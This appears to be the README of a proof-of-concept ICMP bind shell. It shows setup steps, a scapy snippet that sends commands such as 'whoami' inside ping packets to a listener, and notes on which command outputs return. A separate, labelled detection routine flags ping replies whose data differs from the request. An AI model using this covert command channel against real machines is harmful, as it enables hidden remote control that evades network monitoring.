Experimental Python 3.x-based ICMP bind shell listener using scapy, Windows 'compatible'
icmp-bindshell

README/USAGE:

This is a simple PoC for sending basic C2 over ICMP echo/replies via a 'bind' equivalent.

- The listener has been tested on Python 3.x under Windows with 64-bit Python default settings.
- Ensure that you do a 'pip install scapy' prior to using the script.
- Modify the sniff listener 'iface=' to be whichever interface you use.

In Windows, you can find the interface name with show_interfaces(), illustrated below:

    show_interfaces()
    INDEX  IFACE                                IP            MAC
    13     Intel(R) Dual Band Wireless-AC 8265  172.20.20.20  IntelCor:11:22:00

Client Usage Example:

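Run scapy interactive (aka start > run > cmd.exe > scapy):

    command = "whoami"
    # ICMP echo request (type 8) carrying the command as its data
    sendpkt = IP(src="10.10.10.10", dst="20.20.20.20")/ICMP(type=8)/Raw(load=command)
    ans, unans = sr(sendpkt, timeout=2)
    # first answered (request, reply) pair
    ans[0]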

NOTE: Return payloads do not seem to work well with multi-line output.

Example findings with this base code:

- whoami - returns in ICMP response pkt
- hostname - returns in ICMP response pkt
- ipconfig - returns only a new line in response pkt and '\n' errors in the listening console screen
- ping foo.com - returns empty in response pkt with payload on the listening console screen
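A detection sketch for the traffic described above, as an added example that is not part of the original repository: RFC 792 requires an echo reply to return the request's data unchanged, so a reply whose data differs from its request (command in, output out) stands out. It uses only the standard library; the function names, addresses and payloads are constructed for illustration.

```python
import struct

def parse_echo(icmp: bytes):
    """Return (type, id, seq, data) for an ICMP echo request (8) or reply (0), else None."""
    if len(icmp) < 8:
        return None
    icmp_type, code, _cksum, ident, seq = struct.unpack("!BBHHH", icmp[:8])
    if icmp_type not in (0, 8) or code != 0:
        return None
    return icmp_type, ident, seq, icmp[8:]

def find_echo_mismatches(packets):
    """packets: iterable of (src_ip, dst_ip, icmp_bytes) in capture order.
    Returns one alert per echo reply whose data differs from its request."""
    pending = {}   # (requester, responder, id, seq) -> request data
    alerts = []
    for src, dst, icmp in packets:
        parsed = parse_echo(icmp)
        if parsed is None:
            continue
        icmp_type, ident, seq, data = parsed
        if icmp_type == 8:
            pending[(src, dst, ident, seq)] = data
        else:
            # A reply travels responder -> requester, so swap the addresses.
            request = pending.pop((dst, src, ident, seq), None)
            if request is not None and request != data:
                alerts.append({"requester": dst, "responder": src,
                               "request": request, "reply": data})
    return alerts

def echo(icmp_type, ident, seq, data):
    """Build a constructed ICMP echo message (checksum left at 0 for brevity)."""
    return struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + data

# Constructed sample traffic (not a real capture).
WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"   # default Windows ping data
SAMPLE = [
    ("192.0.2.10", "192.0.2.20", echo(8, 1, 7, WINDOWS_PING)),
    ("192.0.2.20", "192.0.2.10", echo(0, 1, 7, WINDOWS_PING)),   # normal ping
    ("192.0.2.10", "192.0.2.30", echo(8, 0, 0, b"whoami")),
    ("192.0.2.30", "192.0.2.10", echo(0, 0, 0, b"constructed-output\n")),
]

if __name__ == "__main__":
    for alert in find_echo_mismatches(SAMPLE):
        print(alert)
```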

This software provides no expressed warranty or liability for use and is licensed under GPLv2.

Dennis Chow dchow[AT]xtecsystems.com www.scissecurity.com
